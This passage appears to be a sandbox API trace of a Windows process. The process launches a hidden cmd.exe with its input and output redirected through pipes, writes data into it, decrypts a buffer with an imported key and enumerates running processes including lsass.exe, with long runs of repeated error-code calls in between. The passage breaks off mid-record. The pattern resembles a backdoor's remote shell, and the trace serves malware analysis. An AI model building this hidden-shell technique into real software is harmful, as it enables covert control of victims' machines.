Wow64DisableWow64FsRedirection (in: OldValue=0x292ff28 | out: OldValue=0x292ff28*=0x0) returned 1 [0134.615] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0134.615] CreatePipe (in: hReadPipe=0x292ff34, hWritePipe=0x292ff38, lpPipeAttributes=0x292ff10, nSize=0x0 | out: hReadPipe=0x292ff34*=0x264, hWritePipe=0x292ff38*=0x260) returned 1 [0134.616] CreatePipe (in: hReadPipe=0x292ff30, hWritePipe=0x292ff2c, lpPipeAttributes=0x292ff10, nSize=0x0 | out: hReadPipe=0x292ff30*=0x270, hWritePipe=0x292ff2c*=0x274) returned 1 [0134.616] SetHandleInformation (hObject=0x260, dwMask=0x1, dwFlags=0x0) returned 1 [0134.616] SetHandleInformation (hObject=0x270, dwMask=0x1, dwFlags=0x0) returned 1 [0134.616] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x292febc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x264, hStdOutput=0x274, hStdError=0x274), lpProcessInformation=0x292ff00 | out: lpCommandLine=0x0, lpProcessInformation=0x292ff00*(hProcess=0x27c, hThread=0x278, dwProcessId=0xf38, dwThreadId=0xf3c)) returned 1 [0134.623] WriteFile (in: hFile=0x260, lpBuffer=0x26a13d0*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x292ff1c, lpOverlapped=0x0 | out: lpBuffer=0x26a13d0*, lpNumberOfBytesWritten=0x292ff1c*=0x5b, lpOverlapped=0x0) returned 1 [0134.623] WaitForSingleObject (hHandle=0x27c, dwMilliseconds=0xffffffff) Thread: id = 112 os_tid = 0xfc8 [0139.852] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x440) returned 0x26a4480 [0139.852] CryptImportKey (in: hProv=0xa968b8, pbData=0x2a6f868, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a6f8d0 | out: phKey=0x2a6f8d0*=0xaa91d0) returned 1 [0139.852] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x2a6f8b8, dwFlags=0x0) returned 1 [0139.852] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4480, pdwDataLen=0x2a6f884 | out: pbData=0x26a4480, pdwDataLen=0x2a6f884) returned 1 [0139.852] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0139.852] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x434) returned 0x26a8358 [0139.852] GetLastError () returned 0x0 [0139.853] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x214) returned 0x26a48c8 [0139.853] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0139.853] GetCurrentThreadId () returned 0xfc8 [0139.853] SetLastError (dwErrCode=0x0) [0139.853] GetLastError () returned 0x0 [0139.853] SetLastError (dwErrCode=0x0) [0139.853] GetLastError () returned 0x0 [0139.853] SetLastError (dwErrCode=0x0) [0139.853] GetLastError () returned 0x0 [0139.853] SetLastError (dwErrCode=0x0) [0139.853] GetLastError () returned 0x0 [0139.853] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.854] GetLastError () returned 0x0 [0139.854] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.855] SetLastError (dwErrCode=0x0) [0139.855] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.856] SetLastError (dwErrCode=0x0) [0139.856] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.857] SetLastError (dwErrCode=0x0) [0139.857] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.858] SetLastError (dwErrCode=0x0) [0139.858] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.859] SetLastError (dwErrCode=0x0) [0139.859] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.860] SetLastError (dwErrCode=0x0) [0139.860] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.861] SetLastError (dwErrCode=0x0) [0139.861] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.862] SetLastError (dwErrCode=0x0) [0139.862] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.863] GetLastError () returned 0x0 [0139.863] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.864] GetLastError () returned 0x0 [0139.864] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.865] SetLastError (dwErrCode=0x0) [0139.865] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.866] SetLastError (dwErrCode=0x0) [0139.866] GetLastError () returned 0x0 [0139.867] SetLastError (dwErrCode=0x0) [0139.867] GetLastError () returned 0x0 [0139.867] SetLastError (dwErrCode=0x0) [0139.867] GetLastError () returned 0x0 [0139.867] SetLastError (dwErrCode=0x0) [0139.867] GetLastError () returned 0x0 [0139.867] SetLastError (dwErrCode=0x0) [0139.867] GetLastError () returned 0x0 [0139.867] SetLastError (dwErrCode=0x0) [0139.867] GetLastError () returned 0x0 [0139.867] SetLastError (dwErrCode=0x0) [0139.867] GetLastError () returned 0x0 [0139.867] SetLastError (dwErrCode=0x0) [0139.867] GetLastError () returned 0x0 [0139.867] SetLastError (dwErrCode=0x0) [0139.867] GetLastError () returned 0x0 [0139.867] SetLastError (dwErrCode=0x0) [0139.867] GetLastError () returned 0x0 [0139.867] SetLastError (dwErrCode=0x0) [0139.867] GetLastError () returned 0x0 [0139.868] SetLastError (dwErrCode=0x0) [0139.868] GetLastError () returned 0x0 [0139.868] SetLastError (dwErrCode=0x0) [0139.868] GetLastError () returned 0x0 [0139.868] SetLastError (dwErrCode=0x0) [0139.868] GetLastError () returned 0x0 [0139.868] SetLastError (dwErrCode=0x0) [0139.868] GetLastError () returned 0x0 [0139.868] SetLastError (dwErrCode=0x0) [0139.868] GetLastError () returned 0x0 [0139.868] SetLastError (dwErrCode=0x0) [0139.868] GetLastError () returned 0x0 [0139.868] SetLastError (dwErrCode=0x0) [0139.868] GetLastError () returned 0x0 [0139.868] SetLastError (dwErrCode=0x0) [0139.868] GetLastError () returned 0x0 [0139.868] SetLastError (dwErrCode=0x0) [0139.868] GetLastError () returned 0x0 [0139.868] SetLastError (dwErrCode=0x0) [0139.868] GetLastError () returned 0x0 [0139.869] SetLastError (dwErrCode=0x0) [0139.869] GetLastError () returned 0x0 [0139.869] SetLastError (dwErrCode=0x0) [0139.869] GetLastError () returned 0x0 [0139.869] SetLastError (dwErrCode=0x0) [0139.869] GetLastError () returned 0x0 [0139.869] SetLastError (dwErrCode=0x0) [0139.869] GetLastError () returned 0x0 [0139.869] SetLastError (dwErrCode=0x0) [0139.869] GetLastError () returned 0x0 [0139.869] SetLastError (dwErrCode=0x0) [0139.869] GetLastError () returned 0x0 [0139.869] SetLastError (dwErrCode=0x0) [0139.869] GetLastError () returned 0x0 [0139.869] SetLastError (dwErrCode=0x0) [0139.869] GetLastError () returned 0x0 [0139.869] SetLastError (dwErrCode=0x0) [0139.869] GetLastError () returned 0x0 [0139.869] SetLastError (dwErrCode=0x0) [0139.869] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.870] GetLastError () returned 0x0 [0139.870] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.871] SetLastError (dwErrCode=0x0) [0139.871] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.872] SetLastError (dwErrCode=0x0) [0139.872] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.873] SetLastError (dwErrCode=0x0) [0139.873] GetLastError () returned 0x0 [0139.874] SetLastError (dwErrCode=0x0) [0139.874] GetLastError () returned 0x0 [0139.874] SetLastError (dwErrCode=0x0) [0139.874] GetLastError () returned 0x0 [0139.874] SetLastError (dwErrCode=0x0) [0139.874] GetLastError () returned 0x0 [0139.874] SetLastError (dwErrCode=0x0) [0139.874] GetLastError () returned 0x0 [0139.874] SetLastError (dwErrCode=0x0) [0139.874] GetLastError () returned 0x0 [0139.874] SetLastError (dwErrCode=0x0) [0139.874] GetLastError () returned 0x0 [0139.874] SetLastError (dwErrCode=0x0) [0139.874] GetLastError () returned 0x0 [0139.874] SetLastError (dwErrCode=0x0) [0139.874] GetLastError () returned 0x0 [0139.874] SetLastError (dwErrCode=0x0) [0139.874] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x288 [0139.884] Process32FirstW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.884] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0139.885] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0139.886] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.886] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0139.887] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.887] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0139.888] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0139.889] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0139.889] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0139.890] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0139.890] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.891] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.891] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0139.956] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.957] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, 